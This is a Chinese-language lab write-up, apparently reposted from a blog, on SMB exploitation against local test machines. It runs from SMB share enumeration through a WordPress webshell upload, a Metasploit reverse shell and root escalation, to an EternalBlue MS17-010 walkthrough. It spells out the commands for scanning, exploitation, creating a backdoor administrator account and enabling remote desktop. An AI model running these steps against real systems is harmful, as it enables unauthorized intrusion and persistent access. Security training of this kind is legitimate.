SMB漏洞

article/2025/10/29 12:21:35

目录

一,SMB信息泄露

充电站:

二,MS17-010 (永恒之蓝) 复现


一,SMB信息泄露

靶场:192.168.11.167

攻击机:kali 192.168.11.165

信息探测:

nmap -sV 192.168.11.167

可以看到开放了,22 ssh端口,139,445的smb服务端口,以及3306的mysal服务

扫描更详细的信息:

nmap -A -v -T4 192.168.11.167-A : 探测所有信息
-v : 把探测信息详细输出
-T4: nmap使用最大线程数

对smb协议进行漏洞分析:

针对SMB协议,使用空口令,尝试登录,并查看敏感文件,下载查看

smbclient -L 192.168.11.167

扫到三个设备,print$ 是一个打印机设备,share$ 是一个共享文件夹,IPC$是一个空链接

分别查看 这三个设备上有什么有用的信息,发现除了share$ 之外我们没有查看的权限

smbclient '\\192.168.11.167\print$'
smbclient '\\192.168.11.167\share$'
smbclient '\\192.168.11.167\IPC$'

将deets.txt 、robots.txt等文件 get下来

get  deets.txtget robots.txt

新打开一个运行窗口,查看文件的内容,在查看deets.txt文件时,发现了一个 莫名的password: 12345 先记下来

进一步查看其它文件,进入wordpress文件夹内:

把wordpress的配置文件 get下来,

get wp-config.php

在终端中打开wp-config.php文件

gedit wp-config.php

找到了 wordpress的 username 和 password ,不知道这个username和password是不是其它服务端口的登录 账号和密码

尝试一下:

mysql ,不允许远程登录

ssh:密码错误

尝试失败,

尝试一下看是否具有SMB远程溢出的漏洞:

根据刚开始扫描到的 smb的版本信息去 探测有没有远程溢出漏洞

searchsploit Samba smbd 3.X - 4.Xsearchsploit Samba smbd 4.3.11-Ubunt

没有smb溢出漏洞

 

针对HTTP协议弱点进行分析:

使用dirb进行后台探测:

扫到了wordpress的后台管理界面

使用我们刚才在 wp-config.php中的账户和密码登录:

这里可以上传webshell 木马,进行提权

首先制作一个 webshell,这里用 kali的msfvenom 生成源代码:

 

这里制作了一个,反弹到 攻击机 192.168.11.165  4444端口的木马

复制源代码保存 在桌面的 webshell.php 中

启动监听

msfconsole

然后进行配置:

这里 配置了监听 192.168.11.165 的4444端口

启动:

run

然后去wordpress 的后台管理界面 apparent》edit 》404.php,上传我们刚才制作的webshell代码:

然后点击左下角的提交,

然后访问404 界面 使代码运行:

浏览器访问:http://192.168.11.167/wordpress/wp-content/themes/twentyfifteen/404.php 然后webshell就会执行

然后我们就会看到方才监听的端口开始显示了信息:

输入 shell 。id 查看当前用户的权限

优化一下 命令窗口:

python -c "import pty; pty.spawn('/bin/bash')"

看一下用户组:

看到一个 togie用户

切换到togie用户,并尝试提升为root权限:输入我们刚开始开 deets.txt 文件中获得的密码 12345,成功

至此我们已经获取了最高权限完全攻陷了该服务器

查看/root目录 看到了flag.txt文件

 

充电站:

1,什么是SMB?

SMB协议作为一种局域网文件共享传输协议,常被用来作为共享文件安全传输研究的平台,很流行的协议,它能使你共享文件,磁盘,目录,打印机,甚至网络端口

服务器消息块,又称网络文件共享系统,一种应用层网络传输协议,由微软开发,主要功能是使网络上的机器能够共享计算机文件、打印机、串行端口和通讯等资源。它也提供经认证的行程间通信机能。它主要用在装有Microsoft Windows的机器上,在这样的机器上被称为Microsoft Windows Network。

经过Unix服务器厂商重新开发后,它可以用于连接Unix服务器和Windows客户机,执行打印和文件共享等任务


2,什么是SMB远程溢出的漏洞,怎么利用?

官方名称:MS17-010 (永恒之蓝勒索病毒)附上一篇,SMB远程溢出利用的博文:https://www.shystartree.com/2018/07/12/%E4%B8%80%E6%AC%A1SMB%E8%BF%9C%E7%A8%8B%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E7%BB%8F%E5%8E%86%EF%BC%88MS17-010%20EternalBlue%20%EF%BC%89/

MS17-010是一个很出名的漏洞,存在于win 7中 b站上有好多介绍利用视频,不再赘述

4,msfvenom是什么?

Metasploit介绍

几乎每一个玩渗透的人都会接触到Metasploit Framework,简称msf。这是一个渗透测试框架,用ruby语言写的,该框架集成了很多可用的exploit,比如著名的ms08_067等,

msfconsole

这是启动msf的终端命令,注意因为现在msf默认的数据库是postgresql,所以在启动msf之前需要先启动postgresql数据库。 在终端中输入msfconsole即可启动msf

msfvenom

在之前的msf版本中会有msfencode,msfpayload等工具,学习成本比较高,现在这些工具已经被废弃了。取而代之的是msfvenom工具,可以看做它是msfencode与msfpayload的结合版,它允许你自行生成想要的payload

 

二,MS17-010 (永恒之蓝) 复现

永恒之蓝漏洞刚出来的时候,当时很多人是用Shadow Brokers泄露的NSA原生攻击工具来测试,通过“ Fuzzbunch + Eternalblue 组合拳 ”,虽然可以做出getshell效果,但是整个实现过程非常麻烦,不太适合安全新手进行快速实践。

到了Kali Linux 2017.03和Kali Linux 2018版,神器Metasploit直接集成了MS17-010的渗透测试代码,针对Win7和Server2008可以实现getshell,几分钟内就可以将完成整个漏洞复现过程。

漏洞环境复现:

攻击机:kali 2019 192.168.11.165

靶机: windows 7 192.168.11.151

 

启动 metasploit框架,并搜寻有关 MS17-010 的相关利用模块:

msfconsolesearch ms17_010 

可以看到有5 个可以利用的模块

这里可以得到两个工具,其中auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块,exploit/windows/smb/ms17_010_eternalblue是永恒之蓝渗透代码,一般配合使用,前者先扫描,若显示有漏洞,再进行渗透。

我们先使用 1号 进行 扫描,看靶机上是否有 MS17-010漏洞

若有 ,再用  2 号模块进行攻击

使用模块  
msf > use auxiliary/scanner/smb/smb_ms17_010 
设置目标IP或网段  
msf auxiliary(smb_ms17_010) > set RHOSTS 192.168.11.151
执行扫描  
msf auxiliary(smb_ms17_010) > run 

可以看到存在 永恒之蓝漏洞 (测试过程中,Win7需关闭防火墙)

用  2 号模块进行攻击

使用模块  
msf > use exploit/windows/smb/ms17_010_eternalblue 
查看可设置的选项  
msf exploit(ms17_010_eternalblue) > show options 
设置渗透目标ip  
msf exploit(ms17_010_eternalblue) > set RHOST 172.16.70.199 
执行渗透  
msf exploit(ms17_010_eternalblue) > exploit 

然后就取得了 靶机的控制权;

(如果你的命令行中出现乱码,那是因为 win和linux的字符格式不兼容,在kali的终端上方的菜单栏中 终端》 设置字符编码》中文简体-GBK)

然后创建用户,赋予用户管理员权限,开启靶机的远程桌面功能,连接靶机桌面

创建用户名密码 
blue/blue  net user blue blue /add 
将用户blue添加入管理组  
net localgroup administrators blue /add 
开启远程桌面功能  
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f 

新开一个终端窗口:

Kali远程桌面连接Win7  
rdesktop 192.168.11.151:3389

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 


http://chatgpt.dhexx.cn/article/g4bNAdPM.shtml

相关文章

错误集:smbclient访问Windows共享文件夹报错误:protocol negotiation failed: NT_STATUS_CONNECTION_RESET

smbclient访问Windows共享文件夹报错误:protocol negotiation failed: NT_STATUS_CONNECTION_RESET 文章目录 smbclient访问Windows共享文件夹报错误:protocol negotiation failed: NT_STATUS_CONNECTION_RESET报错现象:解决办法:…

windows开启SMB

SMB/Samba是种用来让UNIX系列的操作系统与微软Windows操作系统的SMB/CIFS(Server Message Block/Common Internet File System)网络协议做链接的自由软件。简而言之,此软件在Windows与UNIX系列OS之间搭起一座桥梁,让两者的资源可互…

什么是SMB

一、SMB介绍 通用网络文件系统 1.1、SMB说明 SMB【代表服务器消息块】,是用于共享文件,打印机,串行端口和通0信抽象的协议。 SMB协议上的最早文档是1985年IBM的理查德.夏普(Richard Sharpe)编写(0包含IBM PC网络SMB协议)。目前可以访问的SMB文档是1987年的Microsoft /…

SMBMS

SMBMS 项目搭建 搭建一个maven web项目 配置Tomcat 测试项目是否能够跑起来 导入项目中会遇到的jar包 jsp,servlet,mysql驱动,jstl,starand 创建项目包结构 编写实体类 ORM映射:表-类映射 编写基础公共类 数据库…

SMB信息泄露

SMB信息泄露 1.确保攻击机和靶机处在同局域网/ 首先使用ifconfig命令查看本机IP地址 2.使用 nmap -sn -PE 192.168.56.0/24命令然后扫出靶机IP:192.168.56.103 3.使用nmap -sV 192.168.56.103 命令扫描靶机开放的服务端口 我们发现目标靶机有22,80&…

smbclient命令查看Samba服务共享时出现报错“protocol negotiation failed: NT_STATUS_IO_TIMEOUT”

使用smbclient命令查看Samba服务共享了哪些目录时,报错了,报错信息:protocol negotiation failed: NT_STATUS_IO_TIMEOUT 解决方法: 注释掉网卡配置文件中的DNS, 重启网络 [rootmaster ~]# systemctl restart networ…

【Linux专题】SMB端口号说明

SMB端口号说明 SMB端口号是 TCP/445,还有一些说法是 SMB端口号还包括 137~139, 这种说法只是部分正确; 早期版本的 SMB(SMB 1.0) 最初设计为在 TCP/IP(NBT)上的 NetBIOS 上运行,它使用: TCP/139 进行会话服务(session services) TCP/UDP/137 进行名称服务(name se…

kali(linux) smbclient用法

Smb一般作为文件共享服务器,专门提供Linux与Windows之间的传送文件服务,在kali linux中提供了专用的客户端smbclient 下面就介绍一下其简单用法 如图:-U 后面跟用户名和密码,如果没有则不需要加-U 如图就可以使用linux的ls等命令进…

Linux常用命令——smbclient命令

在线Linux命令查询工具(http://www.lzltool.com/LinuxCommand) smbclient 交互方式访问samba服务器 补充说明 smbclient命令属于samba套件&#xff0c;它提供一种命令行使用交互式方式访问samba服务器的共享资源。 语法 smbclient(选项)(参数)选项 -B<ip地址>&…

注意力机制介绍(attention)

注意力机制是指我们将视觉注意力集中在图像的不同区域&#xff0c;或者将注意力集中在一句话中的某个词语&#xff0c;以下图为例&#xff1a; 人眼的视觉注意力允许我们以“高分辨率”关注某个特定区域&#xff08;例如黄色框内的耳朵&#xff09;同时以“低分辨率”处理周围的…

什么是注意力机制及其应用(self attention)?

一、引言 注意力机制是自深度学习快速发展后广泛应用于自然语言处理、统计学习、图像检测、语音识别等领域的核心技术&#xff0c;例如将注意力机制与RNN结合进行图像分类&#xff0c;将注意力机制运用在自然语言处理中提高翻译精度&#xff0c;注意力机制本质上说就是实现信息…

自注意力(Self-Attention)

一、自注意力机制概述 循环神经网络由于信息传递的容量以及梯度消失问题&#xff0c;实际上也只能建立短距离依赖关系。 为了建立长距离的依赖关系&#xff0c;可以增加网络的层数或者使用全连接网络。但是全连接网络无法处理变长的输入序列&#xff0c;另外&#xff0c;不同的…

5、注意力机制和Transformer模型

1、人类的视觉注意力 从注意力模型的命名方式看&#xff0c;很明显其借鉴了人类的注意力机制&#xff0c;因此&#xff0c;我们首先简单介绍人类视觉的选择性注意力机制。 视觉注意力机制是人类视觉所特有的大脑信号处理机制。人类视觉通过快速扫描全局图像&#xff0c;获得需…

注意力机制原理及其模型发展和应用

点击上方“小白学视觉”&#xff0c;选择加"星标"或“置顶” 重磅干货&#xff0c;第一时间送达 Attention机制在近几年来在图像&#xff0c;自然语言处理等领域中都取得了重要的突破&#xff0c;被证明有益于提高模型的性能。Attention机制本身也是符合人脑和人眼的…

深度解析注意力模型(attention model)

前言attention的内部结构是什么&#xff1f; 前言 这里学习的注意力模型是我在研究image caption过程中的出来的经验总结&#xff0c;其实这个注意力模型理解起来并不难&#xff0c;但是国内的博文写的都很不详细或说很不明确&#xff0c;我在看了 attention-mechanism后才完全…

图解自注意力机制

写在最前边 这个文章是《图解GPT-2 | The Illustrated GPT-2 (Visualizing Transformer Language Models)》的一部分&#xff0c;因为篇幅太长我就单独拿出来了。 当然如果你只想了解自注意力机制可以只看本文的前半部分。 后半部分主要是讲Masked Self-attention在GPT-2中的应…

NeurIPS 2021 | Twins:重新思考高效的视觉注意力模型设计

Twins 是美团和阿德莱德大学合作提出的视觉注意力模型&#xff0c;相关论文已被 NeurIPS 2021 会议接收。本文主要讲述 Twins 解决的难点、设计和实现思路&#xff0c;以及在美团场景的探索落地&#xff0c;希望能对从事视觉算法研发的同学有所帮助和启发。 导读 Twins [1] 是美…

深度理解机器学习20-注意力机制模型

人类的注意力机制&#xff08;Attention Mechanism&#xff09;是从直觉中得到&#xff0c;它是人类利用有限的注意力资源从大量信息中快速筛选出高价值信息的手段。深度学习中的注意力机制借鉴了人类的注意力思维方式&#xff0c;被广泛的应用在自然语言处理&#xff08;Natur…

人工智能之注意力模型

朋友们&#xff0c;如需转载请标明出处&#xff1a;人工智能AI技术的博客_CSDN博客-python系列教程,人工智能,程序人生领域博主 注意力模型 通过对教程中前面一些文章的学习&#xff0c;我们知道可以用上面的神经网络来实现机器翻译。假设要将一段法语句子翻译成英文句子。那么…

注意力之双线性模型注意力

本文主要针对两篇论文&#xff1a;双线性注意力网络模型和深度模块化注意力进行总结&#xff0c;加上自己对其的理解。若有不足&#xff0c;还望指出。 论文地址&#xff1a; 双线性注意力网络 深度模块化注意力 项目地址&#xff1a; 双线性注意力网络 深度模块化注意力 0. 写…